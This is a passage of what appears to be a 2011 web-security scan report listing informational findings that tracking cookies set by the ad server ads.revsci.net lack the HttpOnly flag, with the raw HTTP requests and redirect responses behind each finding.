P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eR-U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eR-U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cq85="MLsXsF8ubi5n4JDyzowlSBbxpQnwGsaEu/PC8n+5VFKBZFiot29LyxVRkzZAFjNpcJ1iCf5x8wb47OfER+70+KpE+UnSMkbFSIrdk96nO3UaWMTESWUpK3OqyDwU+EA/5R8Xf2DD8x4RmpjwIzLVwKiwQ3OFNmbSHqqZn5iMigi7JoO6ztNRmL1mxYWhBSC0DILl88ybW6M+cQpWnZDY0MdXGPdCs6Dk6T/5787NFvTrHYiNQkaAQXrvVknibEJ2Q3EEI6eA8RHWXnsWl3dsumEcJ4AZQLWPtn8GUbAKtpnDk4QG8tRZvs9uUMCro5ahZOoKWY/NuurXK+xiuXPUMnMlb9G3jNnS1qDw5q+tUhXm3KfSyzsyTJOTgNUtMpTnWzmQrnEghGoIuyZuaegLwU8Hbd5/IEQzTkZ8de2MzHz5ZbekRfbuw54TFc+0wtgB9f5ZYPt8rOk="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE9HCAYYlW23lB0u4DcmSH3vrseeRRdc+/iC2/EpD4wnnWVpr8KNuLTYoCJisXn5HT6xtGlexMb/gCd8NEgmVWrScu+R6IK9f5q3gdIzGYbvvIWq2gHYcb6WtSO2eXRkOJUg0hglaqnjXXwOtkFUCqodVLjnzxSp/ocGHhDb1e+NKdqA60VtitzaEjn333JOpoKabSD/s+4LcFeRFZTgI55WVwB1oQEDOQBU6Kcx3qbkKAZeLnuEILa513lbVZwiijORoR9b+gLscYYm9oc4YXZYG+kKyAKVGk23nIxNwnZE+ztabap2OEbvi5J9kgByXK6iiY36G9CAOp6W3g6HPohG+1esZzkKXUpCJfNXJuWR/nAE4eRcT/QWS3w947o39G+CKm8b1hgMDcaOwXgr3SDf1gr6+Ur3tB69BQlRKyHuBuJwKsma4HIdpkK0aaox773kdEYdgUlodh7asCKRrRcMMN3FLt/HISxWSaLQ30YAt1VAMwzttcWOYkEu+j0G7Q9hAKyh18R9a7kSQoFt3+9406AJ0FDSG0olZv0hovf+CndgqByq4SVT5LuB/xh7yEugipKJGSdZw9+k8qOSyv7ni4dw8f5kbgwpNfRIQ4epfWPOOy4uiHB5JZ7B/iTUk77AIXjpdUzD4Am1JWZ3fEOvztWHc4smVf/rFfjhsENJq/YEjZ8GZUinFSFyJWDDCKPQ8It6StqkbwjLbk25MlGZZer7Nk4G1fwGl69syX8EgKN+qKDQqnJmm9PC9SfkTQoBtDA1jsm7/Io7mjIY/Bp/ykaRtJZsNvAN4KR01lPxjycRQLEMblStMerh9Bqya5ugvWOHNRCfJ9ZFRMFWmNgmblJiFUoUyJIwzFeLMss/mSBKB2IJ2CztZJjB/Eo+Q4k27iRW/HbnkgY6z6wwSdm2l4MKREXIPLmRzVQ8lkszqQl1S8Z7mjnNwqtKTjpyn6PKTiX/9dh5XffRWEzn0zymQBTAy55jjM7Ilqs1haSE+cov/8/4FeGVFGUebrMZKyv9aG2VN9zz6aOQJLA22YS4NdmcEQwNAT2mjcPDxTrEzm0SMIk4uw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:42:03 GMT

13.62. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_EFRe="MLsXsF8ubi5n4BCj6Iwxj+ChgP9MmEaXnPMMWCjo3/gXOBYBOsgcKGmq7J3s8bm4bP9V6n0/+EkoPKhDxyym+KpE+UnSzY618JInjZ4Vc3SM3rDP9UJfDSkXg1eZEJ9HLo/9NVCpb9+N+saY7xF1GBUZXMcK1aeMOXP/obAgtoLIVPpP5p2fjSYhtBOPhumCT47DvXqC0WxEZc2TDtWV8rIq0VYJyrB526WlEN32NvjJe2uvbUMygIKnXNAW/AFS2Cdh6UElOOTpD4aZdk9fgCnljiBDJVFj4NlURCJQYL0PUxpDs8c3jgnWAbcm3alSssJ7Cb39tuHUQmW82lxx1e8sus3nHtJM+GM96RXR/2JV0pbo+ZUJ0RuWnlag2CVFsnnhRCI/tQuePjthQWfj08W8edxeZLER9LxUCEWSzBdbMi0ptxQFrq2Qf9ssen3OdR7OfUXgrAM="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE1DNwYU1Q0E9g4i8C/Qn1LhaaecAFfbqgaXHDdjV8tyPsA1wXIiKXHSeIHhw5b9xqtsZIdLnLqe3UntXGuWxHrABhvJWLB8DsrnSBtmbHAMqkC1r1w69+2Ig75BvalsBRcB+5hm0n4glSR2oZMFEdQEsP+SsY1drxpXDQOuSLVOF/7WHqyImZANXQX0yW6jb45taU3elVN485FY73SoRPeOEKvUMlJgl6p39ys8G6MC6sKvyebO1RC4o80l7bMVDrExq8LY2edf+572uSWj286SecRyjQvQY80l7yWw7XpPauFEqA5SQNntF7Cy4saIxrTzZUvP1q103JJ34FlEJAhZ0STlgsn+ipTbYb2i5PqEhgzrnemRmPfCe6XIkv6PeKwEA1Gjrh9WzMDFy3S1T4n1MYTKmcKxIou9AoxCZKXfBmTeWhYuptHZaQ4OfMAQnh/gV5HTRZOtGDio2auretkYJK9pD+PAPap9Oscb6hEZsmmXpNq7wMvs4UQXnWXMgIwJVo3C9DPv4kDImEceQHznbvqlIMpnrt3yXuJmcCol3KYVE9YFv6b801WfpdYKf1KcuFiHvVVKZJMeYW+0sIdOS4648eZUBK6mEyIolVHVnFTtr0nXloRIK/sxRYywUfwy3yzHHqB4WKEGxS8ggkAfqw7waCyVuH/v9bLba4u3eulTejumnCJG25vkfTceM8SQ+L5MrHLE39xguQQYx3eRB+iLaIBrIY3ukixh+76m90zeZ/e8ZPbYZZMkWMAwBjxsvEya6hqPNUiL32dHm3s2j1tW8qPepto0f/YLOnW4Z/HVZc+l7L2YJZ5EWWfMyA3BqeJ9upLY8EmGrHaYCpFYcDXUa0W8p3QMYjKJD1epBGFK/JxUQ6ZnEoSemUsRYdqjoni3xaTGm0FRzXsSeMU9DCtlAPqEK9/IXkP37WFUNSx+PMMdROX5KJmMKbByZULHg91NDlosgErLf0T+fFeHQDJ2S+qR7hXgYOigglu4IjSq8SKVFlQm7tIfBOIocwOIOM7VaBqVrORQe2pLm/mIWUJFqF3zY7/qZ+q4mpe0sdIhRWY2"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.63. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus__g3U="MLsXsF8ubi5n4BCzUIwkp6Hql1A6rO31WVmGRQQBkAeIWvwl0z+NLXGYQV3jYHIoKow4I8MNFXoBKaA0Dmym+Ku0dkfouHaJ+u3AheYIQwDLhXakPiNxvHdXkqX5nUNUQkvVx6Eaj5O9v5Xcjbp9UvegWmGbavTTK0jhnIGcVnPgFyp+WCoXFJ/YCb6xoCFz5/OtP/XFXJ6ARSf8Il8eHtjSQ07DH7e40npqJyO7tdQkVxepqkO4h33GXxQRehGwbDMII/X964qnDBZK+hvoJgSDVTQJgbfrr9VStGZJoYAHl4yP0wCaqMqXev3nQn//YT1f5MDp3TFC5DYQRL8HsygEMgbtautJJDJrFXZfXon5bJIGfS4r2gaBvuG1hs92eLagBvBS0sDmmYhgZ3tvqzlxJ3x0XqGk1zoQfFcwPzRIYEbWjaJNG6mOleL0WvyW7crhgFR1u/9g"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE+jMAYYlW2ENhsq2soHgT7/5aCXkN7z8gcXCgZ1gJyn3KcbcbO6ijSvxycg+svdl1RHZId6XwKd3UntXGuWxHrggCzVWLD8zeu3TRxt2GlttAx89jrR0ywiAS9oiHhUC5/j6jHxtns610llu7thuUkvm0W1AigmkLPr4ijsHP8eAisFNrs3nvh2gNJgEKm9VRBMs7RFZkPTTH5fTNhQOib7i5gRZlCjF3S13zOuGsx0cAErnYgxQjb84eW9IMrhSFJX8K1sO2TOv352sChLy+VtyDpA7eEQg5s02AX67khNVaCeSV2fgaH/i346Ii+yLS7hJD0hirtdxJf16/D1kQSjC7lXzFwzmTGzbqBFVDZzp7JsamCPaFG3htjlIfpr4K4FOk3Lrnid8L4pta8NYHQj4bdnYZtioEJ5gA5gGGX+wvZUNPZic3KdpkK0aaox773kVEadgUlodt7atiGQrZcMMN3FLsdgrVZoSYgntFWl7CUudmmYmCqXyeB1Q400vGfLPoJX9/AABPUAOeTMDatdGRPCq5ZRAidE29QWzaObXh40MuR+xZj8UyCj0culXzCY5bCHGVwBY/UWDkHJlca6q4B7GgWDrZiX2GQ7PwjMN/S44ypNRcgTogtlp1X3dC5uamSkvjcQgplQCGV3fEOvztWXQ4kJVvfrFcjhbMLD6k+sPHeC6YGlfRdaysw2TQlGoLDgaaYEGDejqsvsrdMQdHShkVJ8Dta1I/H+fSD1yGpSAJtEsRo8Syvk/T73FQ9TBxej1VX1CGM7JpvGnbmquj4BTc/v2wnMAmNJnVhhOEeQVY28xWWarAWsQzaso957z6aE9g1MBWmaqopII1Wp0z0jlEIS6p0jzARWJnVyeRsgko1cglKwoVr2/bkaCz+yJgB+eWSIvCLVAQm0KxDfZB7t7gxap/lTCcXCXZAuO65WAUPoyO0NmntgxQLJXUNNzQSplhVyfXLmhWJWcNEgjib6OR9Ngl74CLPAgjcDneaa7jrBPZ7hATmF8msdJ5YacEijhk3P9JLf/Mp5G2ffHStLtiwzC1dh6g1RqMe3JnxN6Q=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-pah=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-pah=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__g3U="MLsXsF8ubi5n4BCzUIwkp6Hql1A6rO31WVmGRQQBkAeIWvwl0z+NLXGYQV3jYHIoKow4I8MNFXoBKaA0Dmym+Ku0dkfouHaJ+u3AheYIQwDLhXakPiNxvHdXkqX5nUNUQkvVx6Eaj5O9v5Xcjbp9UvegWmGbavTTK0jhnIGcVnPgFyp+WCoXFJ/YCb6xoCFz5/OtP/XFXJ6ARSf8Il8eHtjSQ07DH7e40npqJyO7tdQkVxepqkO4h33GXxQRehGwbDMII/X964qnDBZK+hvoJgSDVTQJgbfrr9VStGZJoYAHl4yP0wCaqMqXev3nQn//YT1f5MDp3TFC5DYQRL8HsygEMgbtautJJDJrFXZfXon5bJIGfS4r2gaBvuG1hs92eLagBvBS0sDmmYhgZ3tvqzlxJ3x0XqGk1zoQfFcwPzRIYEbWjaJNG6mOleL0WvyW7crhgFR1u/9g"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhsq2soHgT7/5aCXkN7z8gcXCgZ1gJyn3KcbcbO6ijSvxycg+svdl1RHZId6XwKd3UntXGuWxHrggCzVWLD8zeu3TRxt2GlttAx89jrR0ywiAS9oiHhUC5/j6jHxtns610llu7thuUkvm0W1AigmkLPr4ijsHP8eAisFNrs3nvh2gNJgEKm9VRBMs7RFZkPTTH5fTNhQOib7i5gRZlCjF3S13zOuGsx0cAErnYgxQjb84eW9IMrhSFJX8K1sO2TOv352sChLy+VtyDpA7eEQg5s02AX67khNVaCeSV2fgaH/i346Ii+yLS7hJD0hirtdxJf16/D1kQSjC7lXzFwzmTGzbqBFVDZzp7JsamCPaFG3htjlIfpr4K4FOk3Lrnid8L4pta8NYHQj4bdnYZtioEJ5gA5gGGX+wvZUNPZic3KdpkK0aaox773kVEadgUlodt7atiGQrZcMMN3FLsdgrVZoSYgntFWl7CUudmmYmCqXyeB1Q400vGfLPoJX9/AABPUAOeTMDatdGRPCq5ZRAidE29QWzaObXh40MuR+xZj8UyCj0culXzCY5bCHGVwBY/UWDkHJlca6q4B7GgWDrZiX2GQ7PwjMN/S44ypNRcgTogtlp1X3dC5uamSkvjcQgplQCGV3fEOvztWXQ4kJVvfrFcjhbMLD6k+sPHeC6YGlfRdaysw2TQlGoLDgaaYEGDejqsvsrdMQdHShkVJ8Dta1I/H+fSD1yGpSAJtEsRo8Syvk/T73FQ9TBxej1VX1CGM7JpvGnbmquj4BTc/v2wnMAmNJnVhhOEeQVY28xWWarAWsQzaso957z6aE9g1MBWmaqopII1Wp0z0jlEIS6p0jzARWJnVyeRsgko1cglKwoVr2/bkaCz+yJgB+eWSIvCLVAQm0KxDfZB7t7gxap/lTCcXCXZAuO65WAUPoyO0NmntgxQLJXUNNzQSplhVyfXLmhWJWcNEgjib6OR9Ngl74CLPAgjcDneaa7jrBPZ7hATmF8msdJ5YacEijhk3P9JLf/Mp5G2ffHStLtiwzC1dh6g1RqMe3JnxN6Q=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:34:15 GMT

13.64. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_fS3U="MLsfsN8vLi5noABTslDGHgHql1PWxLtwUwyTr7SqEAeIG7Al09+u78XGTslEJh9hd6s4uyf0KT+RdVkyIHCdaeQj3mcEU7l6Sj3Qj5G4WmW0rSpVxafl8+M3Fk56Oh4ptMDux7SrL5cCm77WnJyEjeFA0mmzapRCOBUulwgIjQm+g66XIT5QuklEZQ0ZUK40lpWz0shPr8fLCb6nws9ZybhLffqh5oA/PO147pi1rhzplrmCnxESmw4o+EBf8zgWak40Ty27uaje21eUT8BSI6pxESrpcBetjrx+EQP5BfDN25iRTl0UGV6Rd0PW+PODtnDjF0aDwrfsnCXsDZA1lz5pIm7H8vTOz6Tp6rXuoEwC4vnK2+3GKFkTy9efnh4s3LEwNZE5D/R1bCjuA8RBSWOKNjVEPgdeYW38wM897HChogDtvYqDXI+EuvaQzYnW2WrcIuVG"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE9HCAYYlW23lB0q4DdGKH3vrseeDWozeseSI8hmVs1y9IiVsnPR7mWvcRq2i/D84TaAa8k5LT4xN0mvOzPwpJrhR300EfJhCEjmBFpjdbk3jl46vifDsQxpSkbUgiDlRIPlPFDddUf4ZwKyGVG8yyZzpc1KlNh+6xHUCydNCWk1pYw2zpCJcy0Xq1ewfSwZgkU8YbWuykXS7fiHQ+7BpC3A9cDo+dBWRC+oLlUiAuI2+OJsqbD3rTZhUcZqf/PHxR44d2yyf16w6rv74vpXGzc03lEFRcLgBiTlqVuFKRCoKYg3hqhE20rtC72XJwbqRf4nqNohc1/W2Rj1Q57pDoa7C/rhV3y1OIkDuM/wU/a2TfzoYbdbeGUGDovksoYO+38RpX4ztBEhTSSdexPYmwohTdS0NaK+7rBfx4LZDgPmZO9m5dZmY/KeiuNJOwZore0i5QDJ+nNyDPl+aqwV68N3+nUC1dgz62t3SR3cAdxXwV0b1N+lT93bHTAYHpmvjFW6LTYO62mmNdMMxE6ZVAMf9Mg3lgWgTpD0AoKv+omt9CweOZkYB167yE24hZJG9BwC0iGnWX+7mmx4f0ilrhSDM8I4HQiJ/LmTmrXGtB2rrsgZ5UyI8PrccHxeXyOrPstSXYvQmVrNJ+nbFs1NhLBfym2WY8l9reQ9vOFVNfN4m3cAlSz0tCntjgnWzbD9T60SDFDdemcbIk/SuIRFhKWOBpg5ALDdhlf0H5WuMPn5Z/o1q3UWmwYf9Xi4EIRBzO0nTds99qepYGtaJZ24V64jJuwYQbKl9ij50Pae3gOxuJ5o/Oh9Kw82gxy35sfQjIwNz7GdtRTXLBMHd+LUbvw6qVpvW5x6vmEtkevPAiSqzuJINH3EtS8s/MDgSBgnRIlq54Jbq0R1xO88si8XtUs/ZcRVgqVtGa9OYQErt0/WvyJiYgBREJX1qLhk72olVr8CMxCo7D3Iqdixu6h1I8iJoaoRrurPDye5dIkrV4oDn582sQqPOfIE9j7DzwcUnBbF5Mwp3rn8l1xx1NDoz9elQZPKNgVDhyjdQtxa1defEdJN3w=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=4650606513023.377?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_gTSf="MLsXsF8ubi5n4JDyDnheiwDql1A60Lsw0wyTHpTkGlKdGbCiOsgce2mqLNp9XQ+oVRFqht3dMO1mX1+8dfVskDjKy2cX/+Z4lnteDZm422W0rSpVxafl8+M3Fk56Oh4ptMD+h/TL16cClJvwhzx3ksiI372OclKk2rrJElMP9zSRn673IT6QntSmNJGRjB9z5zP1BvTF3BWBjl2ihgs4mkfaQEqjt9p+cBVDcmp3g8C/5o7hwOfsvpsaEL2NaEL8Yclw+0Vwxy+NhY8AmK1hLFhm3AjJYvZm7QcK/q0p6GGTtsbZ+yCazwOJc1Va5W5RVdAPXjZwCcYrug1AWdTvw+CX8pl1tT5CvgRtv4wdCIRceojk3s7+FbmOzt1dOtrGM8Ug5CT17KIktYNbeStxehxlUFVwnCxOkk7lLa1gAjSeJOnilkeIzHLo0yuoDlhn88sfkWZXU/94"; rsi_us_1000000="pUMdJE+jMAYYlW2ENjvhvlyjvObDParz4dd72Y2njSIQ3Ejbp4sN6MhluM8oZa8Httq55yHRxC8ZzYVchSGk4TkgcB56UrzjgJIXREFzLX43WBsxlgpdbj61dOiIg76BvfGJFZsjP1DddUf4Z8ICk59e3Twi7ijmYiu3pu3z9gYxZZMb9f1t4xig0cgrpStqeslISiOQIcB8zs8ypIerbzS2TPeSmKj0IlZ4k6qHdysgn6IsIrCK2Q98rebBMt9EQT7AQofgv7NV7iBmcy63NAkt+/NiUqrZvx04W5DA4ia+7TpPasFKKHfSgdztF7O67saYxqjzbUvN1k101FJXYBhcJIthuYGpmv+PlT6ji0bSPzuEhgTIXUBzWjfYfabIkr73uK0CExEj37ApcDXLd7FAMbtRknaeEB7fkKz4rxUsKv2YRcZodYwnZiTvV6eSWxFTylleEaWo/4nXX5xx1S7tTqLSjGgSabCGAJV9rzysY/Ywii41kWDVJwd4Mcmryv0Ys8mQgF099zvt4sJO4+L0DBmttBohCo/NHH4w2NW42OiNAQ4v4GPM9fmSZQAlcnPV300cuFSHvdVJfFM+aW+M8EZOSYCY4eZcFJa2Ez4slFHRhFwt7knbL+pOhl9sHKdX2WJ5S2MUZXMcRPcLyi8gikA/qwYWacyXvX/j7bL1Z8oNz+hpHu91g4NbGbvsTVn7U8Th+LYMrDLU39ALFt6VYJ1L0qkawvLEB9SU00z0AeCjdrkjdjJio2hvUMBiZekzCXSUKE1qap6PxOuHz+1uPRIe7tHF0pkC8z+3Bxl+3YNWD4Z+z5wOoyfTDeoN6VJFV4ug2qwHGSXyhMY9+w5TEGP8secVB08eHPjvIErmYAytwsIud2fgi9Z/AwXu6Yy7YJ8zhFzWS3rMcBLtpxssv/+CSnTmfVYbZS2C9w8ZQQJx5OTTknGzeKtTBlPIpNfRRbwI5PsznWuAg8gClBY5PUzOIV+9KlSFGBF8/DghOQSRr4a/7fOReWHlosdROghDC46Yc8gDO6qZfdb4Lb+40i3dd/BVkYW5lC3XK8W94VNTG14="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gTSf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gTSf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fS3U="MLsfsN8vLi5noABTslDGHgHql1PWxLtwUwyTr7SqEAeIG7Al09+u78XGTslEJh9hd6s4uyf0KT+RdVkyIHCdaeQj3mcEU7l6Sj3Qj5G4WmW0rSpVxafl8+M3Fk56Oh4ptMDux7SrL5cCm77WnJyEjeFA0mmzapRCOBUulwgIjQm+g66XIT5QuklEZQ0ZUK40lpWz0shPr8fLCb6nws9ZybhLffqh5oA/PO147pi1rhzplrmCnxESmw4o+EBf8zgWak40Ty27uaje21eUT8BSI6pxESrpcBetjrx+EQP5BfDN25iRTl0UGV6Rd0PW+PODtnDjF0aDwrfsnCXsDZA1lz5pIm7H8vTOz6Tp6rXuoEwC4vnK2+3GKFkTy9efnh4s3LEwNZE5D/R1bCjuA8RBSWOKNjVEPgdeYW38wM897HChogDtvYqDXI+EuvaQzYnW2WrcIuVG"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE9HCAYYlW23lB0q4DdGKH3vrseeDWozeseSI8hmVs1y9IiVsnPR7mWvcRq2i/D84TaAa8k5LT4xN0mvOzPwpJrhR300EfJhCEjmBFpjdbk3jl46vifDsQxpSkbUgiDlRIPlPFDddUf4ZwKyGVG8yyZzpc1KlNh+6xHUCydNCWk1pYw2zpCJcy0Xq1ewfSwZgkU8YbWuykXS7fiHQ+7BpC3A9cDo+dBWRC+oLlUiAuI2+OJsqbD3rTZhUcZqf/PHxR44d2yyf16w6rv74vpXGzc03lEFRcLgBiTlqVuFKRCoKYg3hqhE20rtC72XJwbqRf4nqNohc1/W2Rj1Q57pDoa7C/rhV3y1OIkDuM/wU/a2TfzoYbdbeGUGDovksoYO+38RpX4ztBEhTSSdexPYmwohTdS0NaK+7rBfx4LZDgPmZO9m5dZmY/KeiuNJOwZore0i5QDJ+nNyDPl+aqwV68N3+nUC1dgz62t3SR3cAdxXwV0b1N+lT93bHTAYHpmvjFW6LTYO62mmNdMMxE6ZVAMf9Mg3lgWgTpD0AoKv+omt9CweOZkYB167yE24hZJG9BwC0iGnWX+7mmx4f0ilrhSDM8I4HQiJ/LmTmrXGtB2rrsgZ5UyI8PrccHxeXyOrPstSXYvQmVrNJ+nbFs1NhLBfym2WY8l9reQ9vOFVNfN4m3cAlSz0tCntjgnWzbD9T60SDFDdemcbIk/SuIRFhKWOBpg5ALDdhlf0H5WuMPn5Z/o1q3UWmwYf9Xi4EIRBzO0nTds99qepYGtaJZ24V64jJuwYQbKl9ij50Pae3gOxuJ5o/Oh9Kw82gxy35sfQjIwNz7GdtRTXLBMHd+LUbvw6qVpvW5x6vmEtkevPAiSqzuJINH3EtS8s/MDgSBgnRIlq54Jbq0R1xO88si8XtUs/ZcRVgqVtGa9OYQErt0/WvyJiYgBREJX1qLhk72olVr8CMxCo7D3Iqdixu6h1I8iJoaoRrurPDye5dIkrV4oDn582sQqPOfIE9j7DzwcUnBbF5Mwp3rn8l1xx1NDoz9elQZPKNgVDhyjdQtxa1defEdJN3w=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
